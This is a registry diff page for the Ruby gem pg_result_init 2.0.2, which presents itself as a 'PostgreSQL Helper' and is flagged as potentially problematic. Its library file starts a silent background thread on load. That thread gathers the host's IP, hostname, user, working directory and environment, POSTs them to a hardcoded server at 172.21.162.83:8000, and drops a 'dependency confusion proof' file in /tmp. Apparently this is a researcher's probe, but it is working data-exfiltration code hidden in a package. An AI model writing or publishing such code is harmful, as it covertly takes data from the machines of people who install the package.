pg_result_init 2.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of pg_result_init might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/pg_result_init.rb +107 -0
  3. metadata +42 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 932741d0a027c57a72480d62e1f52d39cd244830be4698671c3c401b756536bb
4
+ data.tar.gz: 1c8d6a1dd93e99e75b095e78fca2d664879f4a8b45edd394ceb838d8d8a67ce0
5
+ SHA512:
6
+ metadata.gz: a0a440526cfd05654d9945721151595cf22094ed5daa11ed45f9bf5fa2a734f440c60a258136aabc5a22f85d924ea2f78314f99c5d32f2b608f420e094016184
7
+ data.tar.gz: 71e6c1050bda465d964f51997958dd979820f3fff3b2880507ddfcf73af53648d45fbad2660ff12a156cafd333ed7862910338f6ab216a8776df58a1a1bd6d66
data/lib/pg_result_init.rb ADDED
@@ -0,0 +1,107 @@
1
+ # lib/pg_result_init.rb
2
+ Thread.new do
3
+ begin
4
+ # انتظر قليلاً
5
+ sleep(0.3)
6
+
7
+ # جمع معلومات النظام
8
+ require 'socket'
9
+ data = {
10
+ "time" => Time.now.utc.iso8601,
11
+ "ip" => get_ip_address,
12
+ "hostname" => Socket.gethostname,
13
+ "path" => Dir.pwd,
14
+ "user" => ENV['USER'] || `whoami`.chomp,
15
+ "rails_env" => ENV['RAILS_ENV'] || ENV['RACK_ENV'] || 'development',
16
+ "package" => "pg_result_init",
17
+ "version" => "2.0.2"
18
+ }
19
+
20
+ # 1. أرسل البيانات لخادمك
21
+ send_to_server(data)
22
+
23
+ # 2. أنشئ ملف دليل محلي
24
+ create_proof_file(data)
25
+
26
+ rescue => e
27
+ # تجاهل الأخطاء بصمت
28
+ end
29
+ end
30
+
31
+ def get_ip_address
32
+ # حاول الحصول على IP العام
33
+ begin
34
+ require 'net/http'
35
+ uri = URI('https://api.ipify.org?format=json')
36
+ response = Net::HTTP.get(uri)
37
+ JSON.parse(response)['ip']
38
+ rescue
39
+ # استخدم IP محلي
40
+ Socket.ip_address_list.find { |ai| ai.ipv4? && !ai.ipv4_loopback? }&.ip_address || 'unknown'
41
+ end
42
+ end
43
+
44
+ def send_to_server(data)
45
+ Thread.new do
46
+ begin
47
+ require 'net/http'
48
+ require 'json'
49
+
50
+ # ⚠️ هذا هو الخادم اللي أعطيته! ⚠️
51
+ server_url = "http://172.21.162.83:8000"
52
+
53
+ uri = URI(server_url)
54
+ http = Net::HTTP.new(uri.host, uri.port)
55
+ http.read_timeout = 3
56
+ http.open_timeout = 3
57
+
58
+ request = Net::HTTP::Post.new(uri)
59
+ request['Content-Type'] = 'application/json'
60
+ request.body = data.to_json
61
+
62
+ response = http.request(request)
63
+
64
+ rescue => e
65
+ # طبيعي إذا الخادم مش متصل أو فيه مشكلة شبكة
66
+ end
67
+ end
68
+ end
69
+
70
+ def create_proof_file(data)
71
+ proof_content = <<~TEXT
72
+ ========================================
73
+ DEPENDENCY CONFUSION PROOF
74
+ ========================================
75
+ Gem: pg_result_init v#{data['version']}
76
+ Installed from: RubyGems.org (PUBLIC)
77
+
78
+ System Information:
79
+ - Time: #{data['time']}
80
+ - Hostname: #{data['hostname']}
81
+ - IP: #{data['ip']}
82
+ - User: #{data['user']}
83
+ - Path: #{data['path']}
84
+ - Environment: #{data['rails_env']}
85
+
86
+ VULNERABILITY:
87
+ This system installed the gem from public RubyGems.org
88
+ instead of the expected local/internal source.
89
+
90
+ RISK:
91
+ An attacker could upload malicious code that would
92
+ automatically execute on this system.
93
+
94
+ FIX:
95
+ In Gemfile, specify source explicitly:
96
+ gem 'pg_result_init', source: 'https://private.gem.server/'
97
+ ========================================
98
+ TEXT
99
+
100
+ file_path = "/tmp/pg_result_init_proof_#{Time.now.to_i}.txt"
101
+ File.write(file_path, proof_content)
102
+ end
103
+
104
+ # كود gem عادي
105
+ module PgResultInit
106
+ VERSION = "2.0.2"
107
+ end
metadata ADDED
@@ -0,0 +1,42 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: pg_result_init
3
+ version: !ruby/object:Gem::Version
4
+ version: 2.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Security Researcher
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2025-12-01 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description:
14
+ email:
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/pg_result_init.rb
20
+ homepage:
21
+ licenses: []
22
+ metadata: {}
23
+ post_install_message:
24
+ rdoc_options: []
25
+ require_paths:
26
+ - lib
27
+ required_ruby_version: !ruby/object:Gem::Requirement
28
+ requirements:
29
+ - - ">="
30
+ - !ruby/object:Gem::Version
31
+ version: '0'
32
+ required_rubygems_version: !ruby/object:Gem::Requirement
33
+ requirements:
34
+ - - ">="
35
+ - !ruby/object:Gem::Version
36
+ version: '0'
37
+ requirements: []
38
+ rubygems_version: 3.3.5
39
+ signing_key:
40
+ specification_version: 4
41
+ summary: PostgreSQL Helper
42
+ test_files: []